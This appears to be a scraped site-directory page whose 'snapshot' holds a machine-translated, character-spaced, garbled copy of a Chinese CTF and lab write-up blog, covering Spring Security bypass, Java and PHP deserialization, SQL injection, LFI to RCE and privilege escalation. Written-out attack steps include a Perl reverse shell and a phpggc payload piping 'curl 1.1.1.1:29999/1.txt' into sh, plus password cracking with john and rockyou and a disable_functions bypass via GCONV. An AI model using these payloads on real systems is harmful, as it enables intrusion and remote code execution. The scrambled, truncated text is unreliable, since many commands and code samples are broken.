Lxxx

Website tags

The site has not been set up keywords

---

Website description

Justanovice

---

Previous article:Beijing office buildings, office buildings rental and rental prices, Beijing joint office, shared office information-Beijing 58 joint office network

Next article:This website cannot be accessed

seo Comprehensive information

SEO information	Visit from Baidu IP：- | Mobile visit IP：- | Outbound link: 0 | Site link: 0
IP Internet speed:	IP Address: - Address: - | Internet speed: 838 milliseconds
ALEXA Ranking	World rankings:- | Estimate IP：- | Estimate PV：-
Registration information	- | name:- | Created: Unknown

Included	Baidu	360	Sogou	Google
Query	0	0	0	0

Computer keywords	Mobile phone keywords	Page friendly	Home page location	index	Recent collection
0	0	Excellent computer	-	0	0

Server information Protocol Type HTTP/1.1 200 OK Page Type text/html Server Type nginx Program support Connection ID W/"654afeae-8caf" Message sending 2024 August 11, 2017 GZIP Test Enabled GZIP compression Source file size 33.16KB Compressed size 13.68KB Compression rate 58.75%

Website snapshot

L x x x L x x x L x x x L x x x J u s t a n o v i c e 2 0 2 3 Zhejiang University Student Provincial Competition Preliminary Competition s e c O b j L x x x   p u b l i s h e d o n 2 0 2 3 1 1 0 8 Question Information This question involves knowledge points: J a v a Code audit, S p r i n g S e c u r i t y Permission verification bypass, H o t S w a p p a b l e T a r g e t S o u r c e Bypass the blacklist, S i g n e d O b j e c t Secondary deserialization question type: C T F Title: 2 0 2 3 Zhejiang University Student Provincial Competition Preliminary Competition s e c O b j Title mirror: c c r . c c s . t e n c e n t y u n . c o m / l x x x i n / p u b l i c : z j c t f 2 0 2 3 _ s e c o b j Internal port: 8 0 Question attachment: 6 Z O + 5 o 6 l O i B o d H R w c z o v L 3 B h b i 5 i Y W l k d S 5 j b 2 0 v c y 8 x T l B B U l h L L W N r W G N T Q U 9 Q V H l y b G x L U T 9 w d 2 Q 9 Z m x h Z y D m j 5 D l j 5 b n o I E 6 I G Z s Y W c = （ Do it yourself B a s e 6 4 Decode) Please make sure to install the script locally d o c k e r Command, and make sure that port 1 2 3 4 5 is not occupied, then r o o t Permission to run the following command. After successful execution, a string of 1 hexadecimal string will be returned (this is a container I D ） ， Indicates that the container runs successfully, then open it C h r o m e or F i r e f o x Browser, use the browser to access 1 2 3 4 5 port 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 e F L A G = f l a g c c r . c c s . t e n c e n t y u n . c o m / l x x x i n / p u b l i c : z j c t f 2 0 2 3 _ s e c o b j W r i t e U p S p r i n g S e c u r i t y The permission bypass analysis question is given to the attachment, decompile and open, the overall directory structure is as follows: S p r i n g S e c u r i t y Permission verification exists A d m i n C o n t r o l l e r and I n d e x C o n t r o l l e r Customized one O b j e c t I n p u t S t r e a m See first p o m rely, p o m Dependency is quite normal, there are no very special dependencies: Let's see A d m i n C o n t r o l l e r ， It is obvious that there is a deserialization portal in / a d m i n Under route, since it is used here S p r i n g S e c u r i t y Do permission verification, so you need to try to bypass permission verification observation S e c u r i t y C o n f i g Category: First c o n f i g u r e The second access control was done c o n f i g u r e Set up a d m i n Password, however a d m i n The password is u u i d The randomly generated access control chain here is as follows: 1 ( ( H t t p S e c u r i t y ) ( ( F o r m L o g i n C o n f i g u r e r ) ( ( H t t p S e c u r i t y ) ( ( E x p r e s s i o n U r l A u t h o r i z a t i o n C o n f i g u r e r . A u t h o r i z e d U r l ) ( ( E x p r e s s i o n U r l A u t h o r i z a t i o n C o n f i g u r e r . A u t h o r i z e d U r l ) h t t p . a u t h o r i z e R e q u e s t s ( ) . a n t M a t c h e r s ( n e w S t r i n g [ ] ) ) . h a s R o l e ( A D M I N ) . a n y R e q u e s t ( ) ) . p e r m i t A l l ( ) . a n d ( ) ) . f o r m L o g i n ( ) . d e f a u l t S u c c e s s U r l ( / a d m i n / u s e r / h e l l o ) ) . a n d ( ) ) . l o g o u t ( ) . l o g o u t S u c c e s s U r l ( / l o g i n ) ; Due to the type conversion in decompilation, the original chain access control is very ugly to compile. Here is a little beautification: The original intention is to have it A D M I N People of the role can access it / a d m i n / * The default login route for successful resource under / a d m i n / u s e r / h e l l o Jump to log out / l o g i n 1 2 3 4 5 6 h t t p . a u t h o r i z e R e q u e s t s ( ) . a n t M a t c h e r s ( n e w S t r i n g [ ] ) . h a s R o l e ( A D M I N ) . a n y R e q u e s t ( ) . p e r m i t A l l ( ) . a n d ( ) . f o r m L o g i n ( ) . d e f a u l t S u c c e s s U r l ( / a d m i n / u s e r / h e l l o ) ) . a n d ( ) . l o g o u t ( ) . l o g o u t S u c c e s s U r l ( / l o g i n ) ; There is actually bypass here: / a d m i n / * In fact, only one layer of resources is matched, for example: / a d m i n / a ， Can match / a d m i n / a . j s ， But it cannot match / a d m i n / a / b If you want a match / a d m i n / a / b ， It needs to be written / a d m i n / * * The deserialization portal here is located in / a d m i n / u s e r / r e a d O b j ， But used / a d m i n / * To match, obviously, it is not matched here bypass and S p r i n g S e c u r i t y No matter, this matching pattern is designed like this. If encountered in a production environment, it is a problem for developers. Therefore, no parameters are added or no S E S S I O N In the case of / a d m i n / u s e r / h e l l o So the question is, why is it directly P O S T Go to visit / a d m i n / u s e r / r e a d O b j But it can't do it?It should be noted that the return here is 4 0 3 F o r b i d d e n ， Not 4 0 1 U n a u t h o r i z e d ， So the permission judgment has actually been passed, and the reason for returning 4 0 3 is actually S p r i n g S e c u r i t y It will be enabled by default c s r f Verify, prevent c s r f Attack, in fact, during development, many training videos will be put into S p r i n g S e c u r i t y of c s r f Verification is turned off (as shown in the following code): R e a d M o r e Spring and Autumn Cloud Mirror T u n n e l X L x x x   p u b l i s h e d o n 2 0 2 3 1 0 3 1 Collect and call information on the Internet S i t e S e r v e r v 1 6 . 5 Database external network information collection: Port 80 has one S i t e S e r v e r C M S Version is v 1 6 . 5 2 1 2 1 There is an anonymous login on the port F T P Service, F T P There is a service s e c r e t . 7 z download s e c r e t . 7 z （ here M a c Can't download it, use it L i n u x of f t p Can be downloaded) 1 2 3 4 f t p 3 9 . 9 9 . 2 3 8 . 6 9 2 1 2 1 a n o n y m o u s d i r g e t s e c r e t . 7 z After downloading, s e c r e t . 7 z Open the password required, first convert it to j o h n Format, then use j o h n Go to blast the password (completely run here j o h n It takes 4 8 hours, but the password is relatively high, and it can run out in about 1 minute) The password is 1 3 1 3 1 3 1 3 1 3 3, please be careful to use 7 z Command to unzip, M a c Unzip the password and enter it will fail 1 2 3 7 z 2 j o h n s e c r e t . 7 z > 1 . t x t j o h n 1 . t x t w o r d l i s t = / u s r / s h a r e / w o r d l i s t s / r o c k y o u . t x t 7 z x s e c r e t . 7 z After decompression, there is one s e c r e t . t x t ， Give one u u i d ， This is S i t e S e r v e r C M S of A P I Key 1 7 z x s e c r e t . 7 z 8 0 There is a port S i t e S e r v e r v 1 6 . 5 Service, this version has a background S Q L injection: h t t p s : / / g i t h u b . c o m / s i t e s e r v e r / c m s / i s s u e s / 3 2 3 7 S i t e S e r v e r C M S Provided for use H e a d e r of A P I Authentication method replaces account password login, so we have A P I After that, you can directly call the background interface and then cause S Q L injection h t t p s : / / s s c m s . c o m / d o c s / v 6 / a p i / g u i d e / a u t h e n t i c a t i o n . h t m l # % E 4 % B D % B F % E 7 % 9 4 % A 8 a p i % E 5 % A F % 8 6 % E 9 % 9 2 % A 5 % E 8 % B F % 9 B % E 8 % A 1 % 8 C % E 8 % B A % A B % E 4 % B B % B D % E 8 % A E % A 4 % E 8 % A F % 8 1 A streamlined backend S Q L The injection request packet is as follows, and the following contents are expanded from this data packet: 1 2 3 4 5 6 7 P O S T / a p i / p a g e s / c m s / l i b r a r y T e x t / l i s t H T T P / 1 . 1 H o s t : 3 9 . 9 9 . 2 3 8 . 2 0 9 X S S A P I K E Y : e 7 d 4 1 8 9 0 5 7 4 2 4 8 f 0 9 f 3 c 1 3 9 3 d b 5 4 1 f c 7 C o n t e n t T y p e : a p p l i c a t i o n / j s o n C o n t e n t L e n g t h : 1 2 7 use D N S Tunnel rebound s h e l l and the agent have been tested, here W e b Services and M y S Q L The database is separate, and M y S Q L Database T C P It's not out of the Internet, but D N S Outbound (can be used c u r l Take-out part command result), so we need to build D N S Tunnel (not T C P Tunnel) At this time we can only execute S Q L Statement, if you want to execute commands, you can use loading u d f . s o Execute the command in the way, due to loading u d f . s o The data packet is relatively large, so I will not post it in the article here, the script has been placed G i t h u b superior: R e a d M o r e Spring and Autumn Cloud Mirror F l a r u m L x x x   p u b l i s h e d o n 2 0 2 3 0 8 1 5 External network F l a r u m “ Weak" password backend P h a r Click to open a login box, and it was stuck for 3 hours. According to the homepage prompt, the user name is a d m i n i s t r a t o r ， The email address is a d m i n i s t r a t o r @ x i a o r a n g . l a b Here is the password, r o c k y o u . t x t Run the password a d m i n i s t r a t o r 、 1 c h r i s Enter the background, here the external network uses F l a r u m Frame, this frame last year P Niu posted an article, it is a backstage R C E Hole: h t t p s : / / m p . w e i x i n . q q . c o m / s / E q E y E D K p z x S 5 B Y A _ t 7 4 p 9 A Function points are being edited C S S The principle of processing is simply to use l e s s . p h p Compilation L e s s ， During the compilation process, use @ i m p o r t ( i n l i n e ) and d a t a Pseudo-protocol writes files to a s s e t s / f o r u m . c s s In, use again d a t a u r i ( p h a r : / / . / a s s e t s / f o r u m . c s s ) trigger p h a r The deserialization implementation command executes the deserialization chain here by p h p g g c Generate: Bounce here s h e l l Need a little trick, my way of playing here is: on port 2 9 9 9 9 H T T P Put one in the service. t x t ， Then listen on port 3 9 9 9 9 ready to get s h e l l 1 p e r l e u s e S o c k e t ; $ i = 1 . 1 . 1 . 1 ; $ p = 3 9 9 9 9 ; s o c k e t ( S , P F _ I N E T , S O C K _ S T R E A M , g e t p r o t o b y n a m e ( t c p ) ) ; i f ( c o n n e c t ( S , s o c k a d d r _ i n ( $ p , i n e t _ a t o n ( $ i ) ) ) ) ; Use again p h p g g c Generate 1 p h p p h p g g c p t a r b M o n o l o g / R C E 6 s y s t e m c u r l 1 . 1 . 1 . 1 : 2 9 9 9 9 / 1 . t x t | s h p a y l o a d As follows: 1 @ i m p o r t ( i n l i n e ) d a t a : t e x t / c s s ; b a s e 6 4 , d G V z d C 5 0 e H Q A A A A A A A . . . . . . ; Visit, p h a r The content is successfully written and edited, using d a t a u r i Do p h a r Deserialization trigger command execution 1 2 3. t e s t take s h e l l The next part is the raising of power, this question is useless s u i d raising rights, use c a p a b i l i t i e s Elevate permission, search and set c a p a b i l i t i e s Executable file 1 g e t c a p r / 2 > / d e v / n u l l Discover o p e n s s l Can be used: o p e n s s l Generate certificate start w e b Service listening on 8 0 8 0 port 1 2 o p e n s s l r e q x 5 0 9 n e w k e y r s a : 2 0 4 8 k e y o u t / t m p / k e y . p e m o u t / t m p / c e r t . p e m d a y s 3 6 5 n o d e s o p e n s s l s _ s e r v e r k e y / t m p / k e y . R e a d M o r e 2 0 2 3 N e p C T F E z _ i n c l u d e L x x x   p u b l i s h e d o n 2 0 2 3 0 8 1 5 This question will not be mirrored, it is too confusing, and various knowledge points are mixed together. I look forward to it N e p Public mirror (Question information title: 2 0 2 3 N e p C T F E z _ i n c l u d e Title description: A p a c h e 2 It will automatically restart every five minutes, which will not affect the process of solving the questions and deploy the questions for a while. Please wait patiently (if it is still inaccessible after more than 10 minutes, please destroy the container and restart it). You can refer to: h t t p s : / / t t t a n g . c o m / a r c h i v e / 1 3 9 5 / W r i t e U p This question refers to the solutions of other masters, and is currently bypassing d i s a b l e _ f u n c t i o n s Some of them saw two ways of playing, respectively, using G C O N V and L D _ P R E L O A D Environment variables d i s a b l e _ f u n c t i o n s The general idea of ​​this question is as follows: P H P of f i l t e r Pseudo-protocol completed L F I arrive R C E use D O M D o c u m e n t Native class write file bypass d i s a b l e _ f u n c t i o n s Elevate the power of environmental variables f l a g G C O N V First, open the topic, click the home page button, there is a l i n k Parameters, the file contains a splicing of the backend, and then pass it in / t m p / r e s o u r c e s / 4 Will become / t m p / r e s o u r c e s / 4 . t x t use p h p _ f i l t e r _ c h a i n _ g e n e r a t o r Generate a paragraph L F I 2 R C E The mysterious string (the specific principle is not explained here, simply put it simply to use it B a s e 6 4 and U T F 8 change U T F 7 Patch together a piece of features w e b s h e l l ， Including w e b s h e l l Implement command execution) h t t p s : / / g i t h u b . c o m / s y n a c k t i v / p h p _ f i l t e r _ c h a i n _ g e n e r a t o r 1 p y t h o n 3 p h p _ f i l t e r _ c h a i n _ g e n e r a t o r . p y c h a i n Then pass the string generated above to l i n k Parameters, the password of the Trojan is 1 in one sentence, just execute the command, please note that there is d i s a b l e _ f u n c t i o n s ， So execute first p h p i n f o Check d i s a b l e _ f u n c t i o n s and d i s a b l e _ c l a s s e s What are there d i s a b l e _ f u n c t i o n s and d i s a b l e _ c l a s s e s The contents are as follows 1 2 f p a s s t h r u , f g e t s s , f g e t s , f o p e n , f r e a d , s h o w _ s o u c e , s t r e a m _ s o c k e t _ c l i e n t , f s o c k o p e n , p c n t l _ a l a r m , p c n t l _ f o r k , p c n t l _ w a i t p i d , p c n t l _ w a i t , p c n t l _ w i f e x i t e d , p c n t l _ w i f s t o p p e d , p c n t l _ w i f s i g n a l e d , p c n t l _ w i f c o n t i n u e d , p c n t l _ w e x i t s t a t u s , p c n t l _ w t e r m s i g , p c n t l _ w s t o p s i g , p c n t l _ s i g n a l , p c n t l _ s i g n a l _ g e t _ h a n d l e r , p c n t l _ s i g n a l _ d i s p a t c h , p c n t l _ g e t _ l a s t _ e r r o r , p c n t l _ s t r e r r o r , p c n t l _ s i g p r o c m a s k , p c n t l _ s i g w a i t i n f o , p c n t l _ s i g t i m e d w a i t , p c n t l _ e x e c , p c n t l _ g e t p r i o r i t y , p c n t l _ s e t p r i o r i t y , p c n t l _ a s y n c _ s i g n a l s , s y s t e m , e x e c , s h e l l _ e x e c , p o p e n , p r o c _ o p e n , p a s s t h r u , s y m l i n k , l i n k , s y s l o g , i m a p _ o p e n , d l , m a i l , e r r o r _ l o g , d e b u g _ b a c k t r a c e , d e b u g _ p r i n t _ b a c k t r a c e , g c _ c o l l e c t _ c y c l e s , a r r a y _ m e r g e _ r e c u r s i v e , p f s o c k o p e n , r e a d f i l e , f i l e _ g e t _ c o n t e n t s , f i l e _ p u t _ c o n t e n t s , f p u t s , f w r i t e , d e l e t e , r m d i r , r e n a m e , c h g r p , c h m o d , c h o w n , c o p y , c h d i r , m k d i r , f i l e , c h r o o t , a s s e r t , d l , m o v e _ u p l o a d _ f i l e , s y s m l i n k , r e a d l i n k , c u r l _ i n i t , c u r l _ e x e c E x c e p t i o n , S p l D o u b l y L i n k e d L i s t , E r r o r , E r r o r E x c e p t i o n , A r g u m e n t C o u n t E r r o r , A r i t h m e t i c E r r o r , A s s e r t i o n E r r o r , D i v i s i o n B y Z e r o E r r o r , C o m p i l e E r r o r , P a r s e E r r o r , T y p e E r r o r , V a l u e E r r o r , U n h a n d l e d M a t c h E r r o r , C l o s e d G e n e r a t o r E x c e p t i o n , L o g i c E x c e p t i o n , B a d F u n c t i o n C a l l E x c e p t i o n , B a d M e t h o d C a l l E x c e p t i o n , D o m a i n E x c e p t i o n , I n v a l i d A r g u m e n t E x c e p t i o n , L e n g t h E x c e p t i o n , O u t O f R a n g e E x c e p t i o n , P h a r E x c e p t i o n , R e f l e c t i o n E x c e p t i o n , R u n t i m e E x c e p t i o n , O u t O f B o u n d s E x c e p t i o n , O v e r f l o w E x c e p t i o n , P D O E x c e p t i o n , R a n g e E x c e p t i o n , U n d e r f l o w E x c e p t i o n , U n e x p e c t e d V a l u e E x c e p t i o n , J s o n E x c e p t i o n , S p l F i l e O b j e c t , S o d i u m E x c e p t i o n Similarly, I also found that the problem environment was set o p e n _ b a s e d i r This part of the ant sword can be connected normally. There is a h i n t . i n i ， yes p h p . i n i configuration, where / t m p The directory can be accessed in the Ant Sword. You can directly enter the path in the red box to read it. The next step is to bypass it. d i s a b l e _ f u n c t i o n s ， Used here G C O N V Bypass d i s a b l e _ f u n c t i o n s ， The complete method is as follows: In order to facilitate the data packets in the future, we will first use the previous horse to write them. W e b s h e l l arrive / t m p / t e s t . t x t ， because f i l e _ p u t _ c o n t e n t s All functions are filtered, here D O M D o c u m e n t Write files in native classes (note U R L Encoding) 1 2 3 4 1 = $ f = / t m p / t e s t . t x t ; $ d = n e w D O M D o c u m e n t ( ) ; $ d l o a d H T M L ( P D 9 w a H A g a W 5 p X 3 N l d C g n Z G l z c G x h e V 9 l c n J v c n M n L C d P b i c p O 2 V 2 Y W w o J F 9 Q T 1 N U W z F d K T s % 2 F P g % 3 D % 3 D ) ; $ d s a v e H t m l F i l e ( p h p : / / f i l t e r / s t r i n g . s t r i p _ t a g s | c o n v e r t . b a s e 6 4 d e c o d e / r e s o u r c e = $ f ) ; After writing, you can check whether the file size is correct and write one more in Ant Sword. p a y l o a d . c ， Compile it locally into a malicious dynamic link library, which will execute 1. s h File content (This way of playing is relatively stable, I'm here g c o n v _ i n i t ( ) Directly shot s h e l l Yes, the question is not remote, it is estimated that there are many environmental restrictions) 1 2 3 4 5 6 7 8 9 1 0 # i n c l u d e # i n c l u d e v o i d g c o n v ( ) v o i d g c o n v _ i n i t ( ) l x x x i n / c i s c n 2 0 2 3 _ d e s e r b u g W r i t e U p This question examines c c For chain transformation, download the attachment to analyze: T e s t a p p Directly passed in the class b u g s t r parameter b a s e 6 4 Decode and deserialize, and also call t o S t r i n g ( ) The method question is used C C 3 . 2 . 2 Depend on C C 3 . 2 . 2 And later, for some unsafe J a v a The serialization of the class has added a switch, which defaults to the off state, for example C C 6 To be used I n v o k e r T r a n s f o r m e r The class was killed, but the question was given M y e x c e p t Class, note g e t A n y e x c e p t Methods can instantiate a single parameter class. T r A X F i l t e r Class: Therefore s i n k Just click T e m p l a t e s I m p l Splice the middle class g a d g e t ， The question gives the following tips: 1 c n . h u t o o l . j s o n . J S O N O b j e c t . p u t c o m . a p p . M y e x p e c t # g e t A n y e x c e p t Then the next thing is to find a call p u t Where, L a z y M a p # g e t Methods can be called p u t Then find a call g e t Where, requested to call g e t There is only one parameter, and it is M a p Class implementation class usage T a b b y The syntax of searching is as follows ( F r o m a t a o ） ： m a t c h ( s o u r c e : M e t h o d ) w h e r e s o u r c e . C L A S S N A M E = ~ o r g . a p a c h e . c o m m o n s . c o l l e c t i o n s . * m a t c h ( s i n k : M e t h o d ) w h e r e s i n k . P A R A M E T E R _ S I Z E = 1 w i t h s o u r c e , c o l l e c t ( s i n k ) a s s i n k s c a l l t a b b y . a l g o . f i n d J a v a G a d g e t ( s o u r c e , s i n k s , 3 , f a l s e , t r u e ) y i e l d p a t h r e t u r n p a t h The final class found is T i e d M a p E n t r y The stack information is as follows: 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 e x e c : 3 4 7 , R u n t i m e ( j a v a . R e a d M o r e 2 0 2 3 C I S C N Preliminary competition g o s e s s i o n L x x x   p u b l i s h e d o n 2 0 2 3 0 8 1 3 Mirror information title: 2 0 2 3 C I S C N Preliminary competition g o s e s s i o n d o c k e r Mirror: l x x x i n / c i s c n 2 0 2 3 _ g o s e s s i o n f l a g Information: Internal ports in the root directory: 8 0 Note: When deploying, the container needs at least 2 5 6 M B running memory, otherwise the container will not be able to start the question description: c t f e r I wrote the code according to the template of the official documentation, but it seems something went wrong. The container may take one or two minutes to start, please be patient!appendix: g o _ s e s s i o n _ 4 c 9 1 a f 7 9 7 8 0 f c 7 0 a 4 d 2 1 b 2 7 2 b a 3 a 3 7 1 c . z i p Start script 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 e F L A G = f l a g l x x x i n / c i s c n 2 0 2 3 _ g o s e s s i o n W r i t e U p Download the attachment and put it in G o l a n d In analysis, there are three routes in the question: I n d e x A d m i n F l a s k See first I n d e x routing, I n d e x The routing content is very simple, I directly assigned a s e s s i o n ， s e s s i o n In-house n a m e The value is g u e s t ， Found here s e s s i o n of k e y It is through S E S S I O N _ K E Y See again when obtaining environment variables A d m i n Routing: Here s e s s i o n Verified, required n a m e for a d m i n Used here p o n g o 2 Do template rendering, there is a template rendering vulnerability, then look at it F l a s k routing: F l a s k The route will request the 5 0 0 0 port service in the target machine, and the request page is echoed and tested, and the following conclusions are drawn: The 5 0 0 port is p y t h o n of f l a s k Service, enabled d e b u g Mode, source code does not exist s s t i Vulnerability s e s s i o n default k e y It is empty, can be faked directly a d m i n user f l a s k Source code can be used to f l a s k Report an error to obtain: 1 / f l a s k ? n a m e = / The source code is as follows: The correct idea of ​​this question is as follows: s e s s i o n default k e y Empty, forged a d m i n User can call it after A d m i n routing A d m i n Exist in the route p o n g o 2 Template injection vulnerability, p o n g o 2 Template syntax can be referenced D j a n g o Template syntax passed D j a n g o Template injection overlay / a p p / s e r v e r . p y File, due to p y t h o n The service can be "hot-deployed", so after overwriting the malicious file, it will be passed F l a s k Just call the route R C E Let me talk about the wrong idea: The wrong idea is to use it p o n g o 2 Template syntax reading calculation P I N The required files are calculated P I N After passing F l a s k Routing request / c o n s o l e accomplish R C E ， But want to be / c o n s o l e Execute the command in the process only G E T Passing parameters cannot complete verification, and subsequent code execution requests need to be carried C o o k i e Verify, so if this road doesn't work, first get it a d m i n User's s e s s i o n ： Add the following code to r o u t e In the , you can get the forged s e s s i o n 1 2 3 4 5 6 f u n c K e y ( c * g i n . C o n t e x t ) l x x x i n / s c t f 2 0 2 3 _ f u m o b a c k d o o r W r i t e U p Download attachment, audit source code, the question is not available on the Internet i m a g i c k Extended, / v a r / w w w / h t m l The directory cannot be written and re-audged source code. There are three functional points in total: Deserialization and deletion / t m p All contents in the directory (this is a tip for the question) Highlight the current file and look at the back category given by the question: Actually here s i n k There are two points, one is r e a d f i l e Read the file, the other one is n e w $ a ( $ b ) Format code for n e w $ a ( $ b ) Format code, if the question is out of the Internet and w e b If the directory is writeable, you can directly R C E , but this question is not published online. w e b The directory cannot be written, so the question s i n k Click right at r e a d f i l e Then how to trigger it _ _ s l e e p ( ) What about the magic method? _ _ s l e e p The magic method will be called during serialization, so the entire attack process is as follows: First, / t m p Directory clear: 1 2 G E T / ? c m d = r m H T T P / 1 . 1 H o s t : 1 . 1 . 1 . 1 : 4 9 3 3 8 Make another one P P M Picture, select P P M The reason is P P M Some dirty data is allowed to be added at the end, and the dirty data will not be i m a g i c k erase s e s s i o n The content generation method is as follows: Here we set p a t h The attribute is / t m p / r e s Path, this path is / f l a g The path after copying focuses on 16 lines. The number of dirty data here actually has certain requirements. It is set on line 12. P P M The length and width of the picture, i.e. 9 * 9 Pixels, dirty data here + The number of serialized data needs to be greater than or equal to 3 * 9 * 9 and less than or equal to 4 * 9 * 9 （ Here 3 and 4 can be simply understood as the bytes occupied by each pixel). I won’t go into the details, so I will take it as a conclusion here (if you have other ideas, you can send a private message to discuss at any time) 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 R e a d M o r e 2 0 2 3 S C T F p y p y p L x x x   p u b l i s h e d o n 2 0 2 3 0 8 1 3 Question information Question name: 2 0 2 3 S C T F p y p y p ? Title mirror: l x x x i n / s c t f 2 0 2 3 _ p y p y p f l a g information: / f l a g （ need S U I D Elevate rights) Internal port: 8 0 Question description: a p i e c e o f c a k e b u t h a r d w o r k 。 p e r 5 m i n r e s t a r t . p a y a t t e n t i o n t o / a p p / a p p . p y Start script 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 e F L A G = f l a g l x x x i n / s c t f 2 0 2 3 _ p y p y p W r i t e U p Open the title and show no s e s s i o n Can be used S E S S I O N _ U P L O A D _ P R O G R E S S Create a s e s s i o n ： The following p r o x i e s for B u r p S u i t e proxy address 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 i m p o r t r e q u e s t s u r l = h t t p : / / 1 . 1 . 1 . 1 : 4 9 3 4 3 / d a t a = f i l e = c o o k i e s = p r o x i e s = l x x x i n / d f j k 2 0 2 3 _ b a b y u r l W r i t e U p S i g n e d O b j e c t Secondary deserialization This method can only list the directory and read files, and can be directly read files during the game. f l a g ， This image's f l a g need s u i d Only after elevating the power can you read it. If you only want to reproduce the play method, enter the container to / f l a g Assign read permissions to download attachments and decompile them. The file structure is as follows: I n d e x C o n t r o l l e r In-house / h a c k There is a deserialization entry in the route. Here, deserialization is a custom object input stream. U R L V i s i t e r and U R L H e l p e r Filtered out / f i l e The route will read / t m p / f i l e and return the content in U R L H e l p e r There is a deserialization entry in the class because U R L H e l p e r The class is filtered and cannot be deserialized directly, but it can be deserialized twice. S i g n O b j e c t # g e t O b j e c t The next problem will be converted to how to call it S i g n O b j e c t # g e t O b j e c t This test point is 2 0 2 3 Alibaba Cloud C T F of B y p a s s i t 1 Have visited 2 0 2 3 Alibaba Cloud C T F B y p a s s i t 1 Rewrite locally B a s e J s o n N o d e � Class, w r i t e R e p l a c e Delete the method to deserialize the complete one normally P o C As follows: U R L H e l p e r Will be passed in u r l Do verification, but use m y u r l . s t a r t s W i t h ( f i l e ) 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 2 0 2 1 2 2 2 3 2 4 2 5 2 6 2 7 2 8 2 9 3 0 3 1 3 2 3 3 3 4 3 5 3 6 3 7 3 8 3 9 4 0 4 1 4 2 4 3 4 4 4 5 i m p o r t c o m . R e a d M o r e 2 0 2 3 Mindun Cup preliminary match b a b y j a L x x x   p u b l i s h e d o n 2 0 2 3 0 8 1 3 Question information Question name: 2 0 2 3 Fujian Shield Cup preliminary competition b a b y j a d o c k e r Mirror: l x x x i n / m d b 2 0 2 3 _ b a b y j a f l a g information: / f l a g . t x t Internal port: 8 0 8 0 Attachment: Level 4. z i p Start script 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 8 0 e F L A G = f l a g l x x x i n / m d b 2 0 2 3 _ b a b y j a W r i t e U p Download the attachment, decompile first, look at the dependencies, use it v a a d i n 、 f a s t j s o n 、 c 3 p 0 、 m y s q l j d b c ， Each component used here has a vulnerability and then look at the controller part, among which / a d m i n / The route exists J S O N Analysis, need to be passed in d a t a Parameters (parameter value requires b a s e 6 4 Encoding), here is the entry point J S O N Before parsing, it will be S e c u r i t y C h e c k Making matches in the class: Used in the question f a s t j s o n It is version 1.2.2 4 (it is considered an older version), filtered T e m p l a t e s I m p l 、 J d b c R o w S e t I m p l Commonly used s i n k But the question is also provided M y B e a n kind, M y B e a n # g e t C o n n e c t i o n will do J D B C Connected due to the problem f a s t j s o n 1 . 2 . 2 4 ， Can't pass directly p a r s e Call g e t t e r Method, in f a s t j s o n 1 . 2 . 4 7 Can be passed later p a r s e Call g e t t e r Method (if you want to call the developer's custom class g e t t e r Need to be turned on A u t o T y p e S u p p o r t Options, quite useless) But I also used one v a a d i n Dependency, this dependency also has a deserialization vulnerability, which can reflect all calls to any class. g e t t e r Method, specific v a a d i n Deserialization process reference s u 1 8 👴 🏻 Blog: J a v a Deserialization vulnerability (V) R O M E / B e a n S h e l l / C 3 P 0 / C l o j u r e / C l i c k / V a a d i n | Su Shiba's question is still used S p r i n g S e c u r i t y right / a d m i n The route under this is used for permission verification, but the account password is hardcoded in the code, so you can log in and use it directly: Let’s sort it out, the complete attack idea is as follows: First, use the account password to log in to the background to access it / a d m i n / routing, P O S T Incoming d a t a Parameter server-side incoming d a t a parameter b a s e 6 4 Decode, and call f a s t j s o n of p a r s e Analyze the problem f a s t j s o n 1 . 2 . 2 4 Dependency, here we use f a s t j s o n 1 . 2 . 4 7 of p a y l o a d beat c 3 p 0 ， generally f a s t j s o n beat c 3 p 0 All are fighting j n d i ， But the question is filtered out j n d i ， Call here c 3 p 0 of W r a p p e r C o n n e c t i o n P o o l D a t a S o u r c e ， That is to call H E X Serialization byte loader quadratic deserialization content is v a a d i n Depend on M y B e a n # g e t C o n n e c t i o n trigger J D B C Connect to the directory and then read the complete file content E X P As follows: Although the question filters B a d A t t r i b u t e V a l u e E x p E x c e p t i o n string, but its hexadecimal value is not filtered, so it can be used B a d A t t r i b u t e V a l u e E x p E x c e p t i o n Class, title blacklist filtered 5 4 6 5 6 D 7 0 6 C 6 1 7 4 6 5 7 3 4 9 6 D 7 0 6 C yes T e m p l a t e s I m p l kind u s e r = f i l e r e a d _ f i l e : / / / . Used to list / For all files in the directory, please refer to the specific usage: h t t p s : / / g i t h u b . c o m / f n m s d / M y S Q L _ F a k e _ S e r v e r 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 2 0 2 1 2 2 2 3 2 4 2 5 2 6 2 7 2 8 2 9 3 0 3 1 3 2 3 3 3 4 3 5 3 6 3 7 3 8 3 9 4 0 4 1 4 2 4 3 4 4 4 5 4 6 4 7 4 8 4 9 i m p o r t j a v a x . R e a d M o r e 2 0 1 8 2 0 2 3   |   Zhejiang I C P Preparation 2 0 2 1 0 2 0 5 7 2 No. 1

Site summary

about www.xiinnn.com illustrate:
www.xiinnn.com Activist submission by netizens was compiled and included by Micro Navigation Network. Micro Navigation Network only provides www.xiinnn.com The basic information of the public is free to show to the public. www.xiinnn.com What is IP Address: - Address: -, www.xiinnn.com Baidu weight is 0, Baidu mobile weight is 0, Baidu included 0, Baidu included 0, 360 included 0, Sogou included 0, Google included 0, Baidu visit traffic is about - between, Baidu mobile visit traffic is about - between, www.xiinnn.com The registration number is -, the filing person is -, there are 0 keywords included by Baidu, 0 keywords on the mobile phone, and the site has been created so far unknown.

Content statement:

1、 The content included in this site is from big data collection and the copyright belongs to the original website!
2、 If the contents included on this site infringe upon your interests, please contact us to delete them!
3、 This site does not accept violation information. If you find any violation content, please contact us to clear it!
4、 Address of this article: https://www.wl200.cn/links/3f928e7caafd89531dae.html, Please keep the copyright link for copying!

---